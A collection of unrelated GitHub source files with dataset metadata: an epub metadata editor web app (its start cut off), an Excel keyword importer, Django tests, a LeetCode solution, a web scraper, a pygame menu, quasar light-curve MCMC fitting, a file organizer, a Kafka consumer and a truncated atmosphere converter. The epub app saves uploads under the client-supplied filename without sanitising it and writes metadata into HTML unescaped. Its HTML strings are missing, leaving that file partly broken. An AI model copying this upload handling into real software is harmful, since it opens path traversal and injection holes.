fastapi import FastAPI, File, UploadFile, Request\nfrom fastapi.responses import FileResponse, HTMLResponse\nfrom fastapi.staticfiles import StaticFiles\n\nfrom epubmangler import EPub, EPubError, json_to_dict, strip_namespace\n\nINFO, WARNING, ERROR = 0, 1, 2\nUPLOAD = Path('upload')\nSTATIC = Path('static')\nINDEX = Path(STATIC, 'main.html')\nTEMPLATE = Path(STATIC, 'template.html')\n\n\ndef log(message: str, level: int = INFO, pid: int = None) -> None:\n \"\"\"Prints a message that looks kind of like the ones made by uvicorn.\"\"\"\n\n if level == INFO:\n message = f'\\u001b[32mINFO\\u001b[0m: {message}'\n elif level == WARNING:\n message = f'\\u001b[33mWARNING\\u001b[0m: {message}'\n elif level == ERROR:\n message = f'\\u001b[31mERROR\\u001b[0m: {message}'\n\n if pid:\n message += ' [\\u001b[36m' + str(p.pid) + '\\u001b[0m]'\n\n print(message)\n\n\ndef tidy(sleep_length: int = 600) -> None:\n \"\"\"Remove all files in the upload directory on a regular basis.\n \n `sleep_length` is the number of seconds to sleep after each iteration.\"\"\"\n\n while True:\n for file in os.listdir(UPLOAD):\n if file != 'image' and os.stat(Path(UPLOAD, file)).st_mtime > sleep_length:\n os.remove(Path(UPLOAD, file))\n\n for file in os.listdir(Path(UPLOAD, 'image')):\n if os.stat(Path(UPLOAD, 'image', file)).st_mtime > sleep_length:\n os.remove(Path(UPLOAD, 'image', file))\n\n try:\n time.sleep(sleep_length)\n except KeyboardInterrupt:\n break\n\n\nclass TemplateResponse(HTMLResponse):\n \"\"\"\"\"\"\n template:str = open(TEMPLATE, 'r').read()\n def __init__(self, html: str) -> None:\n HTMLResponse.__init__(self, self.template.replace('{{body}}', html))\n\n\napp = FastAPI()\napp.mount('/static', StaticFiles(directory=STATIC), name='static')\napp.mount('/upload', StaticFiles(directory=UPLOAD), name='upload')\n\n\n@app.get('/', response_class=HTMLResponse)\nasync def main() -> HTMLResponse:\n return HTMLResponse(open(INDEX, 'r').read())\n\n\n@app.post('/edit', response_class=TemplateResponse)\nasync def edit(file: UploadFile = File(...)) -> TemplateResponse:\n filename = UPLOAD / file.filename\n\n with open(filename, 'wb') as temp:\n temp.write(await file.read())\n\n try:\n epub = EPub(filename)\n except EPubError:\n os.remove(filename)\n return TemplateResponse(f\"\"\"Not a valid epub file: {filename}\\n\\n\n Create an issue at \n https://github.com/davekeogh/epubmangler/issues \n if your epub is not supported properly. Sorry!\"\"\")\n\n html = (\n '
\\n'\n f'

Editing: {filename.name}

\\n'\n '

Pro tip: Don\\'t touch the Attrib column, unless you know what you are doing.

\\n'\n '
\\n'\n f'\\n'\n )\n\n if epub.get_cover():\n cover_path = Path(epub.get_cover())\n temp_cover = Path()\n\n if cover_path.is_file():\n temp_cover = UPLOAD / 'image' / f'{uuid.uuid4()}{cover_path.suffix}'\n shutil.copy(cover_path, temp_cover)\n\n if temp_cover.is_file():\n html += f''\n\n alt_text = f'Cover page of {epub[\"title\"].text} by {epub[\"creator\"].text}'\n html += f'\"{alt_text}\"\\n'\n\n html += '\\n'\n\n for item in epub.metadata:\n html += f''\n f''\n )\n else:\n html += (\n f'{strip_namespace(item.tag)}:'\n f''\n )\n\n if item.attrib:\n html += f''\n else:\n html += f''\n\n html += f'\\n'\n\n html += (\n ''\n ''\n ''\n '\\n'\n '
TagTextAttrib
\\n'\n\n if strip_namespace(item.tag) == 'description':\n html += (\n f'{strip_namespace(item.tag)}

\\n
'\n )\n\n return TemplateResponse(html)\n\n\n@app.post('/download', response_class=FileResponse)\nasync def download(request: Request) -> FileResponse:\n form = await request.form()\n filename = Path(form['filename'])\n\n if filename.parent != UPLOAD:\n return TemplateResponse(f'bad request: {form}')\n\n epub = EPub(form['filename'])\n items = []\n new_items = []\n\n for field in form.keys():\n if field.endswith('-text') or field.endswith('-attrib') or field == 'filename':\n continue # TODO: Refactor to use match in 3.10+\n elif field == 'cover-upload':\n try:\n epub.set_cover(form['cover-upload'])\n except EPubError:\n epub.add_cover(form['cover-upload'])\n elif re.match('(new[0-9]*)-(.+)', field):\n new_items.append(Element(field))\n else:\n items.append(Element(field))\n\n for element in items:\n element.text = form[f'{element.tag}-text']\n element.attrib = json_to_dict(form[f'{element.tag}-attrib'])\n\n for element in new_items:\n prefix, element.tag = re.match('(new[0-9]*)-(.+)', element.tag).groups()\n element.text = form[f'{prefix}-text']\n element.attrib = json_to_dict(form[f'{prefix}-attrib'])\n\n epub.update(items)\n epub.save(filename, overwrite=True)\n\n # return TemplateResponse(f'Downloading: {Path(epub.file).name}...')\n return FileResponse(filename, filename=filename.name)\n\n\nif __name__ == '__main__':\n p = Process(target=tidy)\n p.start()\n log('Started tidy process', level=INFO, pid=p.pid)\n uvicorn.run(app, host='127.0.0.1', port=8000)\n log('Finished tidy process', level=INFO, pid=p.pid)\n","repo_name":"davekeogh/epubmangler","sub_path":"web/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"22118657692","text":"import openpyxl\n\ndef import_models(wb):\n models = []\n ws = wb['models']\n rows = ws.rows\n for row in rows:\n model = {}\n brand = row[0].value\n model_name = row[1].value\n additional_keywords_str = row[2].value\n priority = row[3].value \n max_price = row[4].value\n min_price = row[5].value\n fair_price = row[6].value\n text = row[7].value\n if additional_keywords_str:\n additional_keywords = additional_keywords_str.split(',')\n else:\n additional_keywords = additional_keywords_str\n if model_name:\n model = dict(brand=brand, model_name=model_name, additional_keywords=additional_keywords, priority=priority, max_price=max_price, fair_price=fair_price, min_price=min_price, text=text)\n models.append(model)\n return models\n\ndef import_divs(wb):\n divs = []\n ws = wb['divs']\n rows = ws.rows\n for row in rows:\n divs.append(row[0].value)\n return divs\n\ndef import_gus(wb):\n gus = []\n ws = wb['gus']\n rows = ws.rows\n for row in rows:\n gus.append(row[0].value)\n return gus\n\ndef import_colors(wb):\n colors = []\n ws = wb['colors']\n rows = ws.rows\n for row in rows:\n colors.append(row[0].value)\n return colors\n\ndef import_limited(wb):\n limited = []\n ws = wb['limited']\n rows = ws.rows\n for row in rows:\n limited.append(row[0].value)\n return limited\n\ndef import_groundsheet(wb):\n groundsheet = []\n ws = wb['groundsheet']\n rows = ws.rows\n for row in rows:\n groundsheet.append(row[0].value)\n return groundsheet\n\ndef import_inner_tent(wb):\n inner_tent = []\n ws = wb['inner_tent']\n rows = ws.rows\n for row in rows:\n inner_tent.append(row[0].value)\n return inner_tent\n\ndef import_urethane(wb):\n urethane = []\n ws = wb['urethane']\n rows = ws.rows\n for row in rows:\n urethane.append(row[0].value)\n return urethane\n\ndef import_vestibule(wb):\n vestibule = []\n ws = wb['vestibule']\n rows = ws.rows\n for row in rows:\n vestibule.append(row[0].value)\n return vestibule\n\ndef import_set(wb):\n set = []\n ws = wb['set']\n rows = ws.rows\n for row in rows:\n set.append(row[0].value)\n return set\n\ndef import_keywords(excel_keywords_path):\n keywords = {}\n wb = openpyxl.load_workbook(excel_keywords_path)\n keywords[\"models\"] = import_models(wb)\n keywords[\"divs\"] = import_divs(wb)\n keywords[\"gus\"] = import_gus(wb)\n keywords[\"colors\"] = import_colors(wb)\n keywords[\"limited\"] = import_limited(wb)\n keywords[\"groundsheet\"] = import_groundsheet(wb)\n keywords[\"inner_tent\"] = import_inner_tent(wb)\n keywords[\"urethane\"] = import_urethane(wb)\n keywords[\"vestibule\"] = import_vestibule(wb)\n keywords[\"set\"] = import_set(wb)\n return keywords","repo_name":"q7y331xk/chocam-scrapper-console","sub_path":"excel/import_keywords.py","file_name":"import_keywords.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10573904085","text":"from urllib.parse import urljoin\n\nfrom selenium.webdriver.common.by import By\nfrom django.urls import reverse_lazy\n\nfrom base_test.functional_tests import BaseFunctionalTest\nfrom .utils import get_letting\n\n\nclass LettingTest(BaseFunctionalTest):\n\n def test_index(self):\n for browser in self.browsers:\n browser.get(urljoin(self.live_server_url, str(reverse_lazy('lettings:index'))))\n h1_title = browser.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(\n h1_title.text,\n 'Lettings'\n )\n\n def test_letting(self):\n (letting, address) = get_letting()\n for browser in self.browsers:\n browser.get(\n urljoin(\n self.live_server_url,\n str(reverse_lazy('lettings:letting', kwargs={'letting_id': letting.id}))\n )\n )\n h1_title = browser.find_element(By.TAG_NAME, 'h1')\n self.assertEqual(\n h1_title.text,\n letting.title\n )\n","repo_name":"Nemesix493/Python-OC-Lettings-FR","sub_path":"lettings/tests/functional_tests.py","file_name":"functional_tests.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"21151454674","text":"class Solution:\n def restoreIpAddresses(self, s: str) -> List[str]:\n # Definition of valid IP address:\n # 1. The length of the ip without '.' should be equal to the length of s;\n # 2. The digit order of ip should be same as the digit order of s;\n # 3. Each part separated by the '.' should not start with '0' except only '0';\n # 4. Each part separared by the '.' should not larger than 255;\n\n if len(s) > 12:\n return []\n ret = []\n\n self.backtrack(s, [[]], 0, ret)\n\n return ret\n\n def backtrack(self, s: str, components: List[List[str]],\n i: int, ret: List[str]):\n if i == len(s):\n # done\n if len(components) == 4:\n if self.is_valid(components[-1]):\n components_str = [''.join(component) for component in components]\n ret.append('.'.join(components_str))\n else:\n # Option 1: finish current component, make a new component:\n if self.is_valid(components[-1]):\n new_component = [s[i]]\n components.append(new_component)\n self.backtrack(s, components, i + 1, ret)\n # unchoose:\n components.pop()\n\n # Option 2: add the current digit to the current component\n components[-1].append(s[i])\n self.backtrack(s, components, i + 1, ret)\n # unchoose\n components[-1].pop()\n\n def is_valid(self, component: List[str]):\n if len(component) == 0:\n return False\n\n if component[0] == \"0\":\n return len(component) == 1\n\n val = int(''.join(component))\n return val <= 255\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/93. Restore IP Addresses/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"17361895322","text":"class RecordRes:\n def __init__(self):\n self.productImage = \"\"\n self.detailPageImage = []\n self.title = \"\"\n self.originalPrice = \"\"\n self.discountPrice = \"\"\n self.sold = \"X\"\n self.artist = \"\"\n self.publisher = \"\"\n self.label = \"\"\n self.productCode = \"\"\n self.barcode = \"\"\n self.releaseDate = \"\"\n self.weight = \"\"\n self.details = \"\"\n","repo_name":"mgh3326/synnara_crawling","sub_path":"record/model/RecordRes.py","file_name":"RecordRes.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32197204882","text":"import requests\nfrom bs4 import BeautifulSoup\n\nquote_page = requests.get(\"https://www.builtinnyc.com/jobs?f[0]=job-category_data-analytics\")\n\nsoup = BeautifulSoup(quote_page.text,'html.parser')\n\ntitle_box = soup.find('h2', attrs={'class' : 'title'})\ntitle = title_box.text.strip()\nprint(title)\n\ncompany_box = soup.find('div', attrs={'class' : 'company-title'})\ncompany = company_box.text.strip()\nprint(company)\n\nimport csv\nwith open ('index1.csv', 'a') as filecsv:\n\twriter = csv.writer(filecsv)\n\twriter.writerow([title,company])\n\n\n","repo_name":"ravina13/Web_scrape","sub_path":"scrape_ex.py","file_name":"scrape_ex.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72657069812","text":"from class_screen import Screen\nimport pygame\n\nclass ScreenMenu(Screen):\n def __init__(self):\n Screen.__init__(self)\n\n self.font = pygame.font.Font(\"assets/fonts/monobit.ttf\", 32)\n self.fontcol_normal = pygame.Color(230,230,230)\n self.fontcol_sel = pygame.Color(50,200,200)\n self.fontcol_input = pygame.Color(50,50,200)\n\n self.menu_buttons = []\n self.menu_selected = 0\n\n self.inputting = False\n\n self.backg_rect = (0, 0, 0, 0)\n\n def reset(self):\n Screen.reset(self)\n self.inputting = False\n self.menu_selected = 0\n\n # Creates a menu button - action is name of screen to switch to if not input, or attribute name to set if input\n def create_button(self, action, text, is_input=False):\n tmp_button = MenuButton(action, text, is_input)\n tmp_button.connect_input(self, action)\n self.menu_buttons.append(tmp_button)\n return tmp_button\n\n def handle_event(self, event):\n if event.type == pygame.KEYDOWN:\n if not self.inputting:\n if event.key == pygame.K_w or event.key == pygame.K_UP:\n self.menu_selected -= 1\n if self.menu_selected < 0:\n self.menu_selected = len(self.menu_buttons) - 1\n\n elif event.key == pygame.K_s or event.key == pygame.K_DOWN:\n self.menu_selected += 1\n if self.menu_selected > len(self.menu_buttons) - 1:\n self.menu_selected = 0\n\n else:\n # Currently selected button\n sel_button = self.menu_buttons[self.menu_selected]\n\n if not event.key == pygame.K_RETURN:\n if event.key == pygame.K_BACKSPACE:\n sel_button.input_text = sel_button.input_text[:-1]\n self.update_backg_size()\n\n elif event.key == pygame.K_ESCAPE:\n self.inputting = False\n\n elif len(sel_button.input_text) < sel_button.input_maxlen:\n if not sel_button.input_number:\n sel_button.input_text += event.unicode\n else:\n try: sel_button.input_text += str(int(event.unicode))\n except ValueError: pass\n\n self.update_backg_size()\n\n if event.key == pygame.K_RETURN:\n self.button_press()\n\n return Screen.handle_event(self, event)\n\n def button_press(self):\n pressed_button = self.menu_buttons[self.menu_selected]\n if pressed_button.input:\n self.inputting = not self.inputting\n if not self.inputting:\n pressed_button.input_done()\n\n else:\n self.newscreen = pressed_button.action\n\n # Update buttons' background rectangle size\n def update_backg_size(self):\n # Width is based on longest text string in current menu's buttons\n tmp_width = 0\n # Height is measured between first and last buttons' Y coordinates\n tmp_height_min, tmp_height_max = None, None\n\n for button in self.menu_buttons:\n # Width\n tmp_len = len(button.text + button.input_text)\n if tmp_len > tmp_width:\n tmp_width = len(button.text + button.input_text)\n # Height\n button_y = button.y + 4\n if tmp_height_min is None:\n tmp_height_min = button_y\n tmp_height_max = button_y\n\n if button_y < tmp_height_min:\n tmp_height_min = button_y\n elif button_y > tmp_height_max:\n tmp_height_max = button_y\n\n backg_width = tmp_width * 12\n backg_height = tmp_height_max - tmp_height_min + 48\n backg_x = self.display.get_width() / 2 - backg_width / 2\n backg_y = tmp_height_min - 24\n self.backg_rect = (backg_x, backg_y, backg_width, backg_height)\n\n def loop(self, framerate):\n for event in pygame.event.get():\n if not self.handle_event(event):\n return False\n\n pygame.draw.rect(self.display, (0, 0, 0), self.backg_rect)\n pygame.draw.rect(self.display, (255, 255, 255), self.backg_rect, 2)\n for i, button in enumerate(self.menu_buttons):\n tmp_color = self.fontcol_normal\n if i == self.menu_selected:\n if self.inputting and button.input:\n tmp_color = self.fontcol_input\n else:\n tmp_color = self.fontcol_sel\n\n button.render(self.font, self.display, tmp_color)\n\n return Screen.loop(self, framerate)\n\nclass MenuButton(object):\n def __init__(self, action, text, input=False):\n self.action = action\n self.text = text\n\n self.input = input\n self.input_hidden = False # Converts input text to asterisks (for passwords)\n self.input_number = False # Accepts only numbers for input\n self.input_maxlen = 20\n self.input_text = \"\"\n\n # Input attribute connection - sets a target object's attribute to this button's input text\n self.input_target = None # Target object to change\n self.input_target_val = None # Name of attribute to change\n\n def set_pos(self, x, y):\n self.x, self.y = x, y\n\n def connect_input(self, target, value):\n self.input_target = target\n self.input_target_val = value\n\n def input_done(self):\n setattr(self.input_target, self.input_target_val, self.input_text)\n\n def render(self, font, tgt_surface, color):\n inp = self.input_text\n if self.input_hidden: # Hide input for passwords\n tmp_txt_len = len(inp)\n inp = \"\"\n for i in range(tmp_txt_len):\n inp += \"*\"\n\n tmp_text = font.render(self.text + inp, False, color)\n text_rect = tmp_text.get_rect(center=(self.x, self.y))\n tgt_surface.blit(tmp_text, text_rect)","repo_name":"AbAeterno8445/AUO","sub_path":"AUO-Client/class_screen_menu.py","file_name":"class_screen_menu.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36070508898","text":"import numpy as np\nfrom numpy import mean, median\nfrom astropy.stats import sigma_clip\nimport scipy.signal as sig\n#from lomb_scargle_red_fix import lomb\nfrom astroML.time_series import lomb_scargle\nimport os, subprocess\nfrom scipy.optimize import curve_fit\nimport emcee\nimport scipy.optimize as op\n\n\nclass quasar_drw:\n \"\"\" This version directly fits state space \"\"\"\n \n def __init__(self, time, signal, error, redshift, preprocess=True):\n self.time = np.array(time, dtype=np.float64)\n self.signal = np.array(signal, dtype=np.float64)\n self.error = np.array(error, dtype=np.float64)\n self.redshift = float(redshift)\n self._preprocessed = False\n \n if ( len(time) != len(signal) ) or ( len(time)!= len(error) ):\n print(\"[quasar_drw] Error in input data: time, signal, error must have the same length.\")\n \n self._sort_data()\n if preprocess == True:\n self._preprocess()\n \n self.__initiate()\n \n\n \n def __initiate(self):\n ## parameters for periodogram\n if (len(self.time) >= 2 and float( np.max(self.time) - np.min(self.time) ) > 0.0 ):\n self.__Tspan = float( np.max(self.time) - np.min(self.time) )\n self.__Ndata = len(self.signal)\n self.__psd_freq = \\\n np.linspace(1.0/self.__Tspan, self.__Ndata/(2.0*self.__Tspan), self.__Ndata) \n self.__dt = self.__Tspan / float(self.__Ndata)\n self.__df = self.__psd_freq[1] - self.__psd_freq[0]\n else:\n pass\n \n \n def get_Tspan(self):\n if (len(self.time) >= 2):\n return self.__Tspan\n else:\n pass\n \n def get_Ndata(self):\n if (len(self.time) >= 2):\n return self.__Ndata\n else:\n pass\n \n def get_psd_freq(self):\n return self.__psd_freq\n \n def get_psd_time(self):\n return 1.0/self.__psd_freq\n \n def get_psd_time_err(self):\n period = self.get_psd_time()\n return (self.__df * period**2.)/2.\n \n \n def _preprocess(self):\n #self._sort_data()\n self._no_outlier()\n self._bin_data()\n self._preprocessed = True\n self.__initiate()\n \n \n \n def get_lc(self):\n \"\"\" output: time, signal, error \"\"\"\n return (self.time, self.signal, self.error)\n \n \n def get_redshift(self):\n return self.redshift\n \n \n def add_lc(self, time, signal, error, preprocess=True):\n self.time = np.array(np.append(self.time, time), dtype=np.float64) \n self.signal = np.array(np.append(self.signal, signal), dtype=np.float64)\n self.error = np.array(np.append(self.error, error), dtype=np.float64)\n \n self._sort_data()\n \n self._preprocessed = False\n \n if (preprocess == True):\n self._preprocess()\n \n self.__initiate()\n \n \n \n def ls_astroML(self):\n \"\"\"\n calculate periodogram using generalized Lomb-Scargle periodogram from AstroML\n function description: http://www.astroml.org/modules/generated/astroML.time_series.lomb_scargle.html\n example: http://www.astroml.org/book_figures/chapter10/fig_LS_example.html\n \"\"\"\n LS_lc = lomb_scargle(self.time, self.signal, self.error, self.__psd_freq*(2.0*np.pi), generalized=True)\n \n return 1.0/self.__psd_freq, LS_lc\n \n \n ### ********************************* ###\n ### for drw modeling ###\n ### ********************************* ###\n \n def fit_drw_emcee(self, nwalkers=500, burnin=150, Nstep=500):\n ndim = 3\n pos = []\n \n z = self.redshift\n time = self.time\n signal = self.signal\n error = self.error\n \n # use most likely val as a initial guess\n nll = lambda *args: -lnlike(*args)\n result = op.minimize(nll, [np.log(300.), np.log(0.01**2.0), np.log(np.mean(signal)/300.)], args=(self.time, self.signal, self.error, self.redshift))\n \n tau_center = np.exp(result[\"x\"][0])\n c_center = np.exp(result[\"x\"][1])\n b_center = np.exp(result[\"x\"][2])\n \n print(\"Initial guess of (tau, c, b) = (\" + format(np.exp(result[\"x\"][0]), \".2f\") + \", \" \\\n + format(np.exp(result[\"x\"][1]), \".2e\") + \", \" \\\n + format(np.exp(result[\"x\"][2]), \".2f\") + \" )\" )\n \n ## initiate a gaussian distribution aroun dthe mean value\n ## modify this part if needed\n tau_sample = np.random.lognormal(mean=np.log(tau_center), sigma=1.0, size=nwalkers)\n c_sample = np.random.lognormal(mean=np.log(c_center), sigma=1.5, size=nwalkers)\n b_sample = np.random.lognormal(mean=np.log(b_center), sigma=1.0, size=nwalkers)\n \n tau_sample, c_sample, b_sample = np.log(tau_sample), np.log(c_sample), np.log(b_sample)\n \n for i in range(nwalkers):\n parameter = np.array([tau_sample[i], c_sample[i], b_sample[i]])\n pos.append(parameter)\n \n sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, args=(time, signal, error, z), a=4.0)\n \n # start MCMC\n sampler.run_mcmc(pos, Nstep)\n \n # remove burn-in\n burnin = burnin\n samples = sampler.chain[:, burnin:, :].reshape((-1, ndim))\n \n ## depending on the preference, return whatever you prefer\n return samples\n\n \n ### ********************************* ###\n ### helper functions for preprocess ###\n ### ********************************* ###\n \n def _sort_data(self):\n \n # take away points w/o data\n idx = self.error > 0.\n time = self.time[idx]\n signal = self.signal[idx]\n error = self.error[idx]\n \n idx = self.time > 0.\n time = self.time[idx]\n signal = self.signal[idx]\n error = self.error[idx]\n \n \n # sort\n idx = np.argsort(time)\n time = time[idx]\n signal = signal[idx]\n error = error[idx]\n \n # restore data\n self.time = time\n self.signal = signal\n self.error = error\n \n \n def _no_outlier(self, sigma=5, iters=100):\n idx = ((np.abs(self.signal) < 100.) & (self.signal > 0.))\n self.time = self.time[idx]\n self.signal = self.signal[idx]\n self.error = self.error[idx]\n \n after_clip = sigma_clip(self.signal, sigma=sigma, iters=iters, cenfunc=median, copy=True)\n \n idx = ~(after_clip.mask)\n self.time = self.time[idx]\n self.signal = self.signal[idx]\n self.error = self.error[idx]\n\n \n def _bin_data(self):\n time2 = []\n signal2 = []\n error2 = []\n count = 0\n \n while(count < len(self.time)):\n idx = ( np.floor(self.time) == np.floor(self.time[count]) )\n signal_temp = self.signal[idx]\n error_temp = self.error[idx]\n nn = len(signal_temp)\n \n signal_temp, error_temp = self.__mag2flux(signal_temp, error_temp)\n signal_temp, error_temp = self.__weighted_mean(signal_temp, error_temp)\n signal_temp, error_temp = self.__flux2mag(signal_temp, error_temp)\n \n time2.append( np.floor(self.time[count]) ) \n signal2.append( signal_temp )\n error2.append( error_temp )\n \n count += nn\n \n self.time = np.asarray(time2)\n self.signal = np.asarray(signal2)\n self.error = np.asarray(error2)\n \n \n ## bin input signal_temp to just one data point\n def _bin(self, signal_temp, error_temp):\n if (len(signal_temp) > 1):\n signal_temp, error_temp = self.__mag2flux(signal_temp, error_temp)\n signal_temp, error_temp = self.__weighted_mean(signal_temp, error_temp)\n signal_temp, error_temp = self.__flux2mag(signal_temp, error_temp)\n \n return signal_temp, error_temp\n \n\n def __mag2flux(self, signal, error):\n flux = 10.**(-1.*signal/2.5)\n return 10.**(-1.*signal/2.5), np.abs( -flux*error*np.log(10.)/2.5 )\n \n \n def __flux2mag(self, signal, error):\n return -2.5*np.log10(signal), np.abs( -2.5* error/signal/np.log(10.))\n \n \n def __weighted_mean(self, signal, error):\n signal_mean = np.sum(signal/error**2.) / np.sum(1./error**2.) \n error_mean = np.sqrt( np.sum(error**2.) ) / np.sqrt( np.float(len(signal)) )\n return signal_mean, error_mean\n \n ### *********************************** ###\n ### END of helper func for preprocess ###\n ### *********************************** ###\n \n \n\n \n \n ##### ------------------------------- #####\n ##### --- END of quasar_drw class --- #####\n ##### ------------------------------- #####\n \n\n\n\n#######################################################\n## ======== Function for MCMC model fitting ======== ##\n#######################################################\ndef likelihood_a(time, tau_fit):\n Ndata = len(time)\n a_array = np.zeros(Ndata, dtype=np.float64)\n \n for i in range(1, Ndata):\n a_array[i] = np.exp( -(time[i]-time[i-1])/tau_fit )\n \n return a_array\n\n\ndef likelihood_omega(time, error, tau_fit, c_fit):\n Ndata = len(time)\n a_array = likelihood_a(time, tau_fit)\n omega = np.zeros(Ndata, dtype=np.float64)\n \n omega[0] = 0.5*tau_fit*c_fit\n \n for i in range(1, Ndata):\n omega[i] = omega[0]*(1.0-a_array[i]**2.0) + \\\n a_array[i]**2.0*omega[i-1]*( 1.0- omega[i-1]/(omega[i-1]+error[i-1]**2.0) )\n \n return omega\n \n\ndef likelihood_X(time, signal, error, tau_fit, c_fit, b_fit, X0=0.0):\n # this is X head (fitted X) in Kelly+09\n Ndata = len(time)\n a_array = likelihood_a(time, tau_fit)\n omega = likelihood_omega(time, error, tau_fit, c_fit)\n signal_0mean = signal - b_fit*tau_fit\n \n X_array = np.zeros(Ndata, dtype=np.float64)\n X_array[0] = X0\n \n for i in range(1, Ndata):\n X_array[i] = a_array[i]*X_array[i-1] + \\\n a_array[i]*omega[i-1]/(omega[i-1]+error[i-1]**2.0)*(signal_0mean[i-1] - X_array[i-1])\n \n return X_array\n\n\ndef likelihood_P(time, signal, error, tau_fit, c_fit, b_fit):\n Ndata = len(time)\n a_array = likelihood_a(time, tau_fit)\n omega = likelihood_omega(time, error, tau_fit, c_fit)\n X_array = likelihood_X(time, signal, error, tau_fit, c_fit, b_fit)\n signal_0mean = signal - b_fit*tau_fit\n \n P_array = np.zeros(Ndata, dtype=np.float64)\n for i in range(Ndata):\n P_array[i] = 1.0/np.sqrt((2.0*np.pi)*(omega[i]+error[i]**2.0)) * \\\n np.exp(-0.5 * ( (X_array[i]-signal_0mean[i])**2.0/(omega[i]+error[i]**2.0) ) )\n \n return P_array\n\n\n# set up for likelihood function\ndef lnlike(theta, time, signal, error, z):\n lntau, lnc, lnb = theta\n tau_fit = np.exp(lntau) * (1.0+z)\n c_fit = np.exp(lnc) * np.sqrt(1.0+z)\n b_fit = np.exp(lnb) / (1.0+z)\n P_array = likelihood_P(time, signal, error, tau_fit, c_fit, b_fit)\n Prob = np.prod(P_array)\n \n if np.isfinite(Prob) and Prob > 0.:\n return np.log(Prob)\n else:\n return -np.inf\n\n\n# set up for prior \ndef lnprior(theta, z, time): \n # prior is determined in the rest frame, no need to multiply (1+z)\n lntau, lnc, lnb = theta\n tau_fit, c_fit, b_fit = np.exp(lntau), np.exp(lnc), np.exp(lnb)\n \n if 1.0 < tau_fit*(1.0+z) < (np.max(time)-np.min(time)) and c_fit > 0.0:\n return 0.0\n else:\n return -np.inf\n\n\n# set up posterior \ndef lnprob(theta, time, signal, error, z): \n lp = lnprior(theta, z, time)\n lk = lnlike(theta, time, signal, error, z)\n lnprob_out = lp + lnlike(theta, time, signal, error, z)\n \n if ( np.isfinite(lp) and np.isfinite(lk) ):\n return lp+lk\n else:\n return -np.inf\n \n########################################\n## ======== END MCMCfunction ======== ##\n########################################\n\n\n\n","repo_name":"wt-liao/quasar_drw","sub_path":"quasar_drw.py","file_name":"quasar_drw.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"26473444494","text":"import os \nimport shutil\nimport datetime\n\n\npath = \"C:/Users/jacob/Desktop/Test\"\nfiles = os.listdir(path)\nlistValidFiles = []\nimgExts = [\".png\", \".jpg\", \".jpeg\", \".gif\",\".svg\"]\ncurrentDate = datetime.date.today().__str__()\n\ndef is_image(file):\n return os.path.splitext(file)[1] in imgExts\n\n#start of main \n #video folders next, etc etc\n\nfor file in files:\n rootext = os.path.splitext(p= os.fspath(files[0]))\n\n if rootext[1] is not None:\n listValidFiles.append(file.__str__);\n\nif len(listValidFiles) > 0:\n\n if (os.path.exists(f'{path}/{currentDate}')):\n print('Error: date path already created')\n\n else:\n os.mkdir(path + \"/\" + currentDate)\n\nif (os.path.exists(f'{path}/{currentDate}/Images/')):\n print('Error: Image path already created')\n\nelse:\n os.mkdir(f'{path}/{currentDate}/Images/')\n #add more types of files here\nfor file in listValidFiles:\n if is_image(file):\n shutil.move(file, f'{path}/{currentDate}/Images/')\n","repo_name":"Blizzardo01/OrganizationProject","sub_path":"OrganizationProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20189453854","text":"import logging\nimport pykafka\nfrom pykafka.common import OffsetType\n\nlogging.basicConfig(format='%(message)s', level=logging.DEBUG)\n\nif __name__ == \"__main__\":\n client = pykafka.KafkaClient(hosts=\"127.0.0.1:9092\")\n consumer = client.topics[b'service-calls'].get_simple_consumer(\n auto_offset_reset=OffsetType.EARLIEST,\n reset_offset_on_start=True\n )\n for message in consumer:\n if message is not None:\n logging.info(message.value)","repo_name":"YungChunLu/kafka_projectV2","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4565401234","text":"import re\nimport zipfile\nimport numpy as np\nfrom astropy.io import fits\nimport astropy.units as u\nfrom doodads.modeling.units import WAVELENGTH_UNITS\nfrom .. import utils\nfrom . import model_grids\n\n__all__ = ['MANQUI_ATMOSPHERES']\n\n_FILENAME_RE = re.compile(r'^manqui_zd([\\d\\.]+)_pwv([\\d\\.]+).txt$')\n\ndef _convert_manqui_atmospheres(download_filepath, output_filepath):\n z = zipfile.ZipFile(download_filepath)\n wavelengths_um = None\n spectra = None\n params = None\n for idx, fileinfo in enumerate(sorted(z.filelist, key=lambda x: x.filename)):\n name = fileinfo.filename\n match = _FILENAME_RE.match(name)\n if match is None:\n raise ValueError(f\"Unexpected filename in {download_filepath} zipfile: {name}\")\n zd, pwv = match.groups()\n zd = float(zd)\n airmass = 1 / np.cos(np.deg2rad(zd))\n pwv = float(pwv)\n with z.open(fileinfo, mode='r') as fh:\n wls, trans = np.genfromtxt(fh, unpack=True)\n if spectra is None:\n spectra = np.zeros((len(z.filelist), len(trans)))\n wavelengths_um = wls\n params = np.zeros(len(z.filelist), dtype=[('airmass', float), ('pwv_mm', float)])\n if wavelengths_um is not None:\n if not np.all(wls == wavelengths_um):\n raise 